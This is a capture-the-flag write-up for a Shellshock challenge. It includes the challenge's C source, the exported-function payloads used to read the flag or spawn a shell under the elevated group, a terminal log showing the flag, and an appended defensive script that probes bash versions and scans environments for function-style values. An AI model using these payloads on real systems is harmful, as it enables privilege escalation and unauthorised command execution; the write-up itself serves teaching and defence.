Challenge description:
Mommy, there was a shocking news about bash.
I bet you already know, but let's just make it sure 🙂
ssh [email protected] -p2222 (pw:guest)
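The source of shellshock.c is:
#define _GNU_SOURCE   /* declares setresuid/setresgid */
#include <stdio.h>
#include <stdlib.h>   /* system */
#include <unistd.h>   /* getegid, setresuid, setresgid */

int main(){
    /* Set real, effective and saved IDs to the effective group ID
       (as written, the UID call is also given the GID). */
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    /* system() hands the caller's environment to the challenge's bash. */
    system("/home/shellshock/bash -c 'echo shock_me'");
    return 0;
}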
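As the name suggests, this challenge requires exploiting the Shellshock vulnerability to get the flag. For a detailed explanation, see: http://www.myhack58.com/Article/html/3/62/2015/60779.htm
So we construct the payload: export foo='() { :; }; cat flag' to get the flag directly, or export foo='() { :; }; bash' to switch to a bash shell running as shellshock2, and then run commands to get the flag: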
shellshock@ubuntu:/home/shellshock$ export foo='() { :; }; bash'
shellshock@ubuntu:/home/shellshock$ ./shellshock
shellshock@ubuntu:/home/shellshock$
shellshock@ubuntu:/home/shellshock$
shellshock@ubuntu:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
shellshock@ubuntu:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
shellshock@ubuntu:/home/shellshock$ whoami
shellshock
shellshock@ubuntu:/home/shellshock$ cat flag
only if I knew CVE-2014-6271 ten years ago..!!
shellshock@ubuntu:/home/shellshock$ id
uid=1048(shellshock) gid=1049(shellshock2) groups=1048(shellshock)
The final flag is: only if I knew CVE-2014-6271 ten years ago..!!
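
A defender-side check for the behaviour used above, added here as an example and not part of the original write-up: probe_bash reports whether a given bash binary runs a command appended to a function-style variable, and scan_env flags environment entries whose value starts with "() {". The function names, the marker string and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example; names, marker and sample data are constructed.

# probe_bash BASH_PATH
# Prints "vulnerable", "patched" or "missing" for the given binary.
# A harmless variable shaped like the write-up's payload is exported;
# if its trailing echo runs at start-up, the binary has CVE-2014-6271.
probe_bash() {
    bin=$1
    [ -x "$bin" ] || { echo missing; return 2; }
    out=$(env -i probe='() { :; }; echo CVE_2014_6271_MARKER' \
          "$bin" -c ':' 2>/dev/null)
    case $out in
        *CVE_2014_6271_MARKER*) echo vulnerable; return 1 ;;
        *) echo patched; return 0 ;;
    esac
}

# scan_env: reads NAME=value lines on stdin and prints the names whose
# value begins with "() {", the prefix a vulnerable bash treats as an
# exported function definition.
scan_env() {
    while IFS= read -r line; do
        name=${line%%=*}
        value=${line#*=}
        case $value in
            '() {'*) printf '%s\n' "$name" ;;
        esac
    done
}

# Constructed sample environment: one entry shaped like the payload in
# the write-up, the rest benign.
sample_env() {
    printf '%s\n' \
        'PATH=/usr/bin:/bin' \
        "foo=() { :; }; bash" \
        'NOTE=mentions () { only in the middle' \
        'LANG=C'
}

# When run as a script with arguments, probe each path given.
for b in "$@"; do
    printf '%s: %s\n' "$b" "$(probe_bash "$b")"
done
```

Running scan_env over the environment that a privileged wrapper is about to pass on (or clearing that environment before calling system()) addresses the same inheritance the challenge binary relies on.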